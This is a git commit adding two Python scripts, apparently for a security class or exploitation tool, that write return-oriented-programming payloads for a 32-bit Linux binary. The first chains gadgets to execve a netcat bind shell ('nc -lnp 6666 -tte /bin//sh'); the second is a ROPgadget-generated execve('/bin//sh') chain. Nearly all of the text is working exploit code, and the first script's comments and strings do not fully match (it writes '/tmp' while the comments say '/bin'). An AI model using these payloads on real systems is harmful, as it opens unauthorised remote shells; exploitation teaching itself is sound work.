Add example scripts

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
Liam Dalgarno 2020-11-28 17:40:49 +00:00
parent e5c6aa6060
commit b5ef4f9a27
2 changed files with 248 additions and 0 deletions

168
docs/exploit-nc.py Normal file
View File

@ -0,0 +1,168 @@
"""
This is a demo python script that creates a ROP chain to launch nc as:
> /bin//nc -lnp 6666 -tte /bin//sh
The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.
With the latest ROPGadget tool that we used in the class, we get the following ropchain:
- Step 1 -- Write-what-where gadgets
[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret
[+] Gadget found: 0x806ee8b pop edx ; ret
[+] Gadget found: 0x80a8bf6 pop eax ; ret
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
- Step 2 -- Init syscall number gadgets
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
[+] Gadget found: 0x807c32a inc eax ; ret
- Step 3 -- Init syscall arguments gadgets
[+] Gadget found: 0x80481c9 pop ebx ; ret
[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret
[+] Gadget found: 0x806ee8b pop edx ; ret
- Step 4 -- Syscall gadget
[+] Gadget found: 0x8049603 int 0x80
- Step 5 -- Build the ROP chain
"""
#!/usr/bin/env python
from struct import pack
import os
######################################
fileName=raw_input("Enter the file name")
outfile=open(fileName, "wb")
# this is just to create variables of the gadgets that we will be using
DATA = 0x080da120
EDAX0 = pack("<I", 0x08050a88)
STACK = pack("<I", DATA) # @ .data
INT80 = pack("<I", 0x08049603) # int 0x80
MOVISTACK = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret
INCEAX = pack("<I", 0x0807c32a) # inc eax ; ret
POPEDX = pack("<I", 0x0806ee8b) # pop edx ; ret
POPECXEBX = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret
POPEAX = pack("<I", 0x080a8bf6) # pop eax ; ret
XOREAX = pack("<I", 0x080562c0) # xor eax, eax ; ret
DUMMY = pack("<I", 0x42424242) # padding
buff = "\x42" * 32
buff += "BBBB"*3
buff += POPEDX # it's via %ecx we will build our stack.
buff += STACK # %ecx contain the stack address.
buff += POPEAX # Lets put content in an address
buff += "/tmp" # put "/usr" in %eax
buff += MOVISTACK # put "/bin" in stack address
buff += POPEDX
buff += pack("<I", DATA + 4) # we change our stack for to point after "/bin"
buff += POPEAX # Applying the same for "/nc"
buff += "//nc"
buff += MOVISTACK # we place "//nc" after "/bin"
buff += POPEDX
buff += pack("<I", DATA + 9) # we change our stack for to point after "bin//nc"+1
# we repeated operation for each argument
buff += POPEAX
buff += "-lnp"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 14)
buff += POPEAX
buff += "6666"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 19)
buff += POPEAX
buff += "-tte"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 24)
buff += POPEAX
buff += "/bin"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 28)
buff += POPEAX
buff += "//sh"
buff += MOVISTACK
#
# We currently have our list of elements separated by \0
# Now we must construct our char ** i.e. array 'argguments' of strings
# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]
#
buff += POPEDX
buff += pack("<I", DATA + 60) # shadow stack address (@ of arguments)
buff += POPEAX
buff += pack("<I", DATA) # @ of "/bin//nc" 0th item of arguments[]
buff += MOVISTACK # we place address of "/bin//nc" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 64) # we shift our Stack Pointer + 4 for the second argument
buff += POPEAX
buff += pack("<I", DATA + 0x9) # @ of "-lnp"
buff += MOVISTACK # we place address of "-lnp" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 68) # we shift our Stack Pointer + 4 for the 3rd argument
buff += POPEAX
buff += pack("<I", DATA + 0xe) # @ of "6666"
buff += MOVISTACK # we palce address of "6666" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 72) # we shift our Stack Pointer + 4 for the 4th argument
buff += POPEAX
buff += pack("<I", DATA + 0x13) # @ of "-tte"
buff += MOVISTACK # we place address of "-tte" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 76) # we shift our Stack Pointer + 4 for the 5th argument
buff += POPEAX
buff += pack("<I", DATA + 0x18) # @ of "/bin//sh"
buff += MOVISTACK # we place address of "/bin//sh" in our STACK
#
# Now we must implement eax to contain the address of
# the execve syscall.
# execve = 0xb
#
buff += XOREAX # %eax is put to zero.
buff += INCEAX * 11 # %eax is now 0xb
buff += POPEDX # last pop
buff += pack("<I", DATA + 48) # edx char *env
buff += POPECXEBX # last pop
buff += pack("<I", DATA + 60) # ecx char **arguments
buff += pack("<I", DATA) # ebx "/usr/bin//nc"
buff += INT80 # we execute
outfile.write(buff)
outfile.close()
#print buff

80
docs/script_reference.py Normal file
View File

@ -0,0 +1,80 @@
# ROP chain generation
# ===========================================================
# - Step 1 -- Write-what-where gadgets
# [+] Gadget found: 0x8056cf5 mov dword ptr [edx], eax ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret
# [+] Gadget found: 0x80a89e6 pop eax ; ret
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
# - Step 2 -- Init syscall number gadgets
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
# [+] Gadget found: 0x807b6da inc eax ; ret
# - Step 3 -- Init syscall arguments gadgets
# [+] Gadget found: 0x80481c9 pop ebx ; ret
# [+] Gadget found: 0x806e262 pop ecx ; pop ebx ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret
# - Step 4 -- Syscall gadget
# [+] Gadget found: 0x80495f3 int 0x80
# - Step 5 -- Build the ROP chain
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
import sys
out_file = sys.argv[1]
p = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x080a89e6) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9064) # @ .data + 4
p += pack('<I', 0x080a89e6) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080562b0) # xor eax, eax ; ret
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x0806e262) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080d9060) # padding without overwrite ebx
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080562b0) # xor eax, eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x080495f3) # int 0x80
with open(out_file, "wb") as f:
f.write(p)